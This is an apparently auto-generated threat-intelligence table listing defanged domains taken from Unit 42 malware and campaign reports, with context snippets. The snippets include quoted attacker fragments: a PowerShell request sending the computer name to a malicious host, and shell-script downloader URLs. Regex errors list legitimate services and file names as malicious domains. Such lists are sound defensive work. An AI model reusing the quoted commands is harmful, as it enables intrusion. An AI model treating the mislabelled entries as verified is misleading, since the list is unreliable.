Indicators of compromise
1,890 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| domain | ffconnectivitycheck.com | /2018 DNSpionage Campaign 185.174.101[.]66 8/6/2018 Oilrig (ffconnectivitycheck[.]com) 185.174.101[.]68 2/14/2019 DNSpionage Campaign 199.247.3 | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | firewallsupports.com | ta (alforatsystem[.]com) 213.202.217[.]4 9/8/2018 Sakabota (firewallsupports[.]com) 213.202.217[.]9 11/18/2018 - 11/29/2018 Oilrig (googie[. | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | googie.email | orts[.]com) 213.202.217[.]9 11/18/2018 - 11/29/2018 Oilrig (googie[.]email) 91.132.139[.]200 4/16/2019, 5/12/2019 Newly identified D | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | google-update.com | date[.]com) 104.168.244[.]213 7/15/2019 - 7/18/2019 Hisoka (google-update[.]com) Additional Resources xHunt Campaign: xHunt Actor’s Cheat | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | learn-service.com | eferenced the domain microsofte-update[.]com but changed to learn-service[.]com in December 2019. As of January 2020, this image is no lo | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | lowconnectivity.com | 2018 DNSpionage Campaign 185.161.211[.]86 10/4/2018 Oilrig (lowconnectivity[.]com) 185.161.209[.]147 11/28/2018 Widespread DNS Hijacking Ac | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | microsofte-update.com | ure. Beginning in May 2019, the image referenced the domain microsofte-update[.]com but changed to learn-service[.]com in December 2019. As o | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | sakabota.com | resolution of interest is with the Sakabota related domain sakabota[.]com . This domain resolved to the IP address 185.15.247[.]140 | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | zombsroyale.io | Activity 199.247.3[.]186 - 198 5/6/2018 - 8/30/2018 Chafer (zombsroyale[.]io) 213.202.217[.]31 7/6/2018 Newly identified DNS redirect | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | afsasdfa33.xyz | name " #Start-sleep -s 10 Invoke-WebRequest -Uri " http : //afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername" $ f = get - content | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | exemsi.com | D22A040A ) was built using an unregistered version from www.exemsi[.]com with the title of MPZMZQYVXO patch version 5.1 . This ver | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | netsupportsoftware.com | entationhost.exe ) is started, it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP P | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | protonmail.com | or print industry. All emails were also sent using a random protonmail[.]com email address and contained email subjects related to ref | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | quickwaysignstx.com | > % temp % \ alpaca . bat &EcHo | s ^ et / p = " http^:^/^/^quickwaysignstx[.]com/view.php " > > % temp % \ alpaca . bat &EcHo | s ^ et / p | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | api.ipify.org | itimate domains may be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[. | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | checkip.amazonaws.com | y be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | icanhazip.com | azonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate domains used by Tr | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ip.anysrc.net | k: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternali | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ipecho.net | following legitimate domains may be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[. | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ipinfo.io | checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate do | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | myexternalip.com | [.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate domains used by Trickbot Anchor_DNS m | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | wtfismyip.com | i[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. L | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | komaru.today | iguration decode function. After decoding its C2 server vpn.komaru[.]today from configuration, MooBot will send out a message to inf | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | wget.sh | ompromised system and renames the binary files to Realtek . wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07 | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cloudfusion.me | 1, we can extract the collection server of the web skimmer: cloudfusion[.]me . This web skimmer is simple, yet classic. It checks whet | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | misuperblog.com | are traffic based on another similar request to the URL www.misuperblog[.]com/tmz/?sRjPP6ZH=21Ru2Nt5y6IynFa8dNKfckGmLKuTraB2ebSZxsJ3CJw | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | voques-tfr.xyz | fb11f468a1f ). They connect to these IPs through the domain voques-tfr[.]xyz . Although this domain is not resolvable anymore, we anal | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | yhys93.site | ed JS that triggers several redirects to an adult website ( yhys93[.]site ). Conclusion As we highlighted in this blog, this quarte | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | js.digestcolect.com | licious domains, including train[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com . Figure 11. Deobfus | Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | stat.trackstatisticsss.com | rain[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com . Figure 11. Deobfuscated source code of a malicious in | Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | train.developfirstline.com | clicked. We identified several malicious domains, including train[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[ | Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 8x19.com | icators of Compromise Infrastructure Malware C2 comeanalyze.8x19[.]com Malware Host 176.123.9[.]238 198.98.49[.]79 104.244.72[.] | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gatemotor.php | [.]com/motor[.]js Collection server personallydeliver[.]com/gatemotor[.]php | Recent Trends in Internet Threats: Common Industries Impersonated in Phishing Attacks, Web Skimmer Analysis and More Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | motor.js | 6. A screenshot of the source code of personallydeliver.com/motor[.]js . After deobfuscating the JS code in motor.js and taking | Recent Trends in Internet Threats: Common Industries Impersonated in Phishing Attacks, Web Skimmer Analysis and More Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | personallydeliver.com | as shown in Figure 15. Figure 15. VirusTotal screenshot of personallydeliver[.]com . The original web skimmer in motor.js is not straightfor | Recent Trends in Internet Threats: Common Industries Impersonated in Phishing Attacks, Web Skimmer Analysis and More Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | dotheneedfull.club | and those botnet client samples would contact the C2 domain dotheneedfull[.]club . Malware Analysis Based on behavior and patterns Unit 42 | Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | lolol.sh | mples that hosted two shell scripts: hxxp://31.210.20[.]100/lolol[.]sh hxxp://212.192.241[.]72/lolol[.]sh The shell script downl | Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | zvub.us | oad a shell script downloader as a file named y from hxxp://zvub[.]us/ . If executed, the shell script downloader would downloa | IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | watchtowr.com | s of long, randomly generated subdomains under dns.outbound.watchtowr[.]com : execSinet:gethostbyname("d0am3pi3pgl6h3t9mkp0qt3zn9p1iz | Keys to the Kingdom: Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | file.exe | /lat3st/w0rld/systemupdateAPI[.]exe newsumbrella[.]net/ne3s/file[.]exe – hosted earlier We believe that the executables hosted u | New Malware 'Rover' Targets Indian Ambassador to Afghanistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | newsumbrealla.net | file systemupdateAPI.exe was no longer being hosted on the newsumbrealla[.]net domain. However, we have noticed the same domain hosting | New Malware 'Rover' Targets Indian Ambassador to Afghanistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | newsumbrella.net | ile exploits CVE-2010-3333 and downloads an executable from newsumbrella[.]net. The executable file downloaded from newsumbrella[.]net i | New Malware 'Rover' Targets Indian Ambassador to Afghanistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | systemupdateapi.exe | folders as shown below newsumbrella[.]net/ne3s/lat3st/w0rld/systemupdateAPI[.]exe newsumbrella[.]net/ne3s/file[.]exe – hosted earlier We be | New Malware 'Rover' Targets Indian Ambassador to Afghanistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | newspot.kr | nd starts getting configuration from the following URL: www.newspot[.]kr/config.php?sUID=[web site name] It downloads a file from | KRBanker Targets South Korea Through Adware and Exploit Kits Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | bbs.softfix.co | b181757b3309995acd1f92e0f63f888aa89423). Another subdomain, bbs.softfix.co[.]kr was hosted on same IP address as bbs.gokickes[.]com, w | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | blog.softfix.co | g: Executable files that connect to the same remote server, blog.softfix.co[.]kr:80, download a DLL file and execute the 'lowmain' expo | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | blogspot.hk | DME.md http://www.ak(masked)[.]jp/images/ http://elsakrblog.blogspot[.]hk/2017/03/test.html C2 115.68.49[.]179:80 115.68.49[.]179:4 | UBoatRAT Navigates East Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | co.kr | files that connect to the same remote server, blog.softfix.co[.]kr:80, download a DLL file and execute the 'lowmain' export | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | githubusercontent.com | sted on Github, using a URL like the following: https://raw.githubusercontent[.]com/r1ng/news/master/README.md The malware accesses the URL a | UBoatRAT Navigates East Asia Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gmarketshop.net | 50df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 C2 lywjrea.gmarketshop[.]net krjregh.sacreeflame[.]com psfir.sacreeflame[.]com lywja.h | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gokickes.com | n, bbs.softfix.co[.]kr was hosted on same IP address as bbs.gokickes[.]com, which was reported as the C2 server of Invader by Cyphor | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | healthsvsolu.com | services in 2008 and 2011. krjregh.sacreeflame[.]com lywja.healthsvsolu[.]com Though we don't know the targets of these malware samples | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | jpn.com | oftfix.co[.]kr www.gokickes[.]com log.gokickes[.]com sansei.jpn[.]com | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | news.softfix.co | softfix.co[.]kr was registered in 2014. One of subdomains, news.softfix.co[.]kr was the C2 server of Daserf (SHA256: 9c7a34390e92d4551 | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | sacreeflame.com | h the privacy protection services in 2008 and 2011. krjregh.sacreeflame[.]com lywja.healthsvsolu[.]com Though we don't know the targets | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | softfix.co | RAT has been used by multiple actors for years. The domain, softfix.co[.]kr was registered in 2014. One of subdomains, news.softfi | “Tick” Group Continues Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | englandprevail.com | alicious files from the remote C2 server; in this case, pre.englandprevail[.]com. Trojanized Legitimate Software SHA256 Movie Player insta | Tick Group Weaponized Secure USB Drives to Target Air Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | dynssl.com | s by using the HTTP POST method on TCP port 443. kted56erhg.dynssl[.]com euiro8966.organiccrap[.]com These domains are provided by | Bisonal Malware Used in Attacks Against Russia and South Korea Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | lookin.at | 71e01fb2aa2856f230943460e14e19183a6 XOR YES YES jennifer998.lookin[.]at, 196.44.49[.]154 2014 South Korea 0919-1 dfa1ad6083aa06b8 | Bisonal Malware Used in Attacks Against Russia and South Korea Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | my-homeip.com | r with the same key “78563412”. It connects to hxxp://games.my-homeip[.]com:443/ks8d[ip address]akspbu.txt by using the HTTP POST met | Bisonal Malware Used in Attacks Against Russia and South Korea Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | organiccrap.com | T method on TCP port 443. kted56erhg.dynssl[.]com euiro8966.organiccrap[.]com These domains are provided by a free DDNS service and bot | Bisonal Malware Used in Attacks Against Russia and South Korea Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | tempors.com | 6FC C2: jennifer998.lookin[.]at 196.44.49[.]154 www.hosting.tempors[.]com kted56erhg.dynssl[.]com euiro8966.organiccrap[.]com 116.1 | Bisonal Malware Used in Attacks Against Russia and South Korea Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | jma-go.jp | n Smoke Loader contains the following hardcoded C2 address. jma-go[.]jp/js/metrology/jma.php An outline of initial C2 communicati | Analysis of Smoke Loader in New Tsunami Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | mountainhigh.at | 5e47fbfff4786eada6cbcb0805ed79d9bd417955c016236143eb2ecd827 Mountainhigh[.]at 75edaae605622e056a40c2d8a16b86654d7ddc772f12c4fc64292a32a | Analysis of Smoke Loader in New Tsunami Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | racemodel.at | ae605622e056a40c2d8a16b86654d7ddc772f12c4fc64292a32a96fde7a Racemodel[.]at 55ae2b00234674d82dcc401a0daa97e7b3921057a07970347815d9c50 | Analysis of Smoke Loader in New Tsunami Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | sungmap.at | re yet. Following is the sample list. Domain Marcher SHA256 Sungmap[.]at 254925e47fbfff4786eada6cbcb0805ed79d9bd417955c016236143eb | Analysis of Smoke Loader in New Tsunami Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | thunderbolt-price.com | . The attacker distributes those files from following URLs. thunderbolt-price[.]com/Art-and-Jakes/Coupon.scr bite-me.wz[.]cz/1.exe thunderbol | Analysis of Smoke Loader in New Tsunami Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | wz.cz | s. thunderbolt-price[.]com/Art-and-Jakes/Coupon.scr bite-me.wz[.]cz/1.exe thunderbolt-price[.]com was registered in 2012 in J | Analysis of Smoke Loader in New Tsunami Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | beta.officopedia.com | rvice[.]net office[.]windown-update[.]com cortanazone[.]com beta[.]officopedia[.]com videos[.]dyndns[.]org service[.]serveftp[.]org syn[.]br | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | blogsite.org | 1f5a9b2d59b08500882563011d1def2b8d0b1b9bbb8ae C2: theme[[.]]blogsite[.]org cortana[.]homelinux[.]com word[.]webhop[.]info work[.]win | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | check.homeip.net | n[.]com syn[.]servebbs[.]com service[.]windown-update[.]com check[.]homeip[.]net outlook[.]updateoffices[.]net mail[.]fptservice[.]net o | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | check.webhop.org | dns[.]org service[.]serveftp[.]org syn[.]browserstime[.]com check[.]webhop[.]org ristineho[.]com Appendix A: Cobalt Strike Beacon contai | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cortana.homelinux.com | 0882563011d1def2b8d0b1b9bbb8ae C2: theme[[.]]blogsite[.]org cortana[.]homelinux[.]com word[.]webhop[.]info work[.]windownoffice[.]com cortana | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cortanasyn.com | from the following remote location and executes it: https://cortanasyn[.]com/Avcv The fourth shellcode loads the embedded Cobalt Strik | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cortanazone.com | .]net mail[.]fptservice[.]net office[.]windown-update[.]com cortanazone[.]com beta[.]officopedia[.]com videos[.]dyndns[.]org service[.] | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | e.browsersyn.com | .]webhop[.]info work[.]windownoffice[.]com cortanasyn[.]com e[.]browsersyn[.]com syn[.]servebbs[.]com service[.]windown-update[.]com che | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | mail.fptservice.net | te[.]com check[.]homeip[.]net outlook[.]updateoffices[.]net mail[.]fptservice[.]net office[.]windown-update[.]com cortanazone[.]com beta[.] | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | office.windown-update.com | .]net outlook[.]updateoffices[.]net mail[.]fptservice[.]net office[.]windown-update[.]com cortanazone[.]com beta[.]officopedia[.]com videos[.]dyn | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | outlook.updateoffices.net | s[.]com service[.]windown-update[.]com check[.]homeip[.]net outlook[.]updateoffices[.]net mail[.]fptservice[.]net office[.]windown-update[.]com c | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ristineho.com | erveftp[.]org syn[.]browserstime[.]com check[.]webhop[.]org ristineho[.]com Appendix A: Cobalt Strike Beacon contains the hard-coded | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | servebbs.com | machine. OS A rchitecture URL User Agent 32 bit https://syn.servebbs[.]com/kuss32.gif Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:6 | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | service.serveftp.org | nazone[.]com beta[.]officopedia[.]com videos[.]dyndns[.]org service[.]serveftp[.]org syn[.]browserstime[.]com check[.]webhop[.]org ristineho | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | service.windown-update.com | cortanasyn[.]com e[.]browsersyn[.]com syn[.]servebbs[.]com service[.]windown-update[.]com check[.]homeip[.]net outlook[.]updateoffices[.]net mail | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | syn.browserstime.com | opedia[.]com videos[.]dyndns[.]org service[.]serveftp[.]org syn[.]browserstime[.]com check[.]webhop[.]org ristineho[.]com Appendix A: Cobalt | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | syn.servebbs.com | .]windownoffice[.]com cortanasyn[.]com e[.]browsersyn[.]com syn[.]servebbs[.]com service[.]windown-update[.]com check[.]homeip[.]net out | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | videos.dyndns.org | own-update[.]com cortanazone[.]com beta[.]officopedia[.]com videos[.]dyndns[.]org service[.]serveftp[.]org syn[.]browserstime[.]com check | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | word.webhop.info | b8ae C2: theme[[.]]blogsite[.]org cortana[.]homelinux[.]com word[.]webhop[.]info work[.]windownoffice[.]com cortanasyn[.]com e[.]browser | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | work.windownoffice.com | ogsite[.]org cortana[.]homelinux[.]com word[.]webhop[.]info work[.]windownoffice[.]com cortanasyn[.]com e[.]browsersyn[.]com syn[.]servebbs[.] | Tracking OceanLotus’ new Downloader, KerrDown Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ad-blocking24.net | affic forwarded to adware tracker-tds[.]info jpadsnow[.]com ad-blocking24[.]net Myqenad24[.]com PUP download example: bd62d3808ef29c557da | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | allureoutlayterrific.com | e99 artificius[.]com Other campaign domains: hoanoola[.]net allureoutlayterrific[.]com Acknowledgements We’d like to thank the entire Unit 42 te | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | artificius.com | s unwanted redirects. This browser opens its own website at artificius[.]com when victims open a new tab or window. Figure 10 illustra | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | experttrafficmonitor.com | eck[.]com hightrafficcounter[.]com proftrafficcounter[.]com experttrafficmonitor[.]com IP addresses hosting campaign entry point 192[.]243[.]59[ | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | featuresscanner.com | nce . Indicators of Compromise Campaign entry point example featuresscanner[.]com Domains part of centralized infrastructure to track victi | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | hightrafficcounter.com | contact the centralized server. professionalswebcheck[.]com hightrafficcounter[.]com proftrafficcounter[.]com experttrafficmonitor[ . ]com For | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | hoanoola.net | e5128c96f2ff5b5e99 artificius[.]com Other campaign domains: hoanoola[.]net allureoutlayterrific[.]com Acknowledgements We’d like to | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | jpadsnow.com | ic forwarded to adware sites such as tracker-tds[.]info and jpadsnow[.]com . The redirection URL includes several parameters to shar | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | myqenad24.com | dware tracker-tds[.]info jpadsnow[.]com ad-blocking24[.]net Myqenad24[.]com PUP download example: bd62d3808ef29c557da64b412c4422935a6 | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | professionalswebcheck.com | recently rotated through to contact the centralized server. professionalswebcheck[.]com hightrafficcounter[.]com proftrafficcounter[.]com expertt | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | proftrafficcounter.com | erver. professionalswebcheck[.]com hightrafficcounter[.]com proftrafficcounter[.]com experttrafficmonitor[ . ]com For example, the campaign co | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | tracker-tds.info | e saw examples of traffic forwarded to adware sites such as tracker-tds[.]info and jpadsnow[.]com . The redirection URL includes several | ApateWeb: An Evasive Large-Scale Scareware and PUP Delivery Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.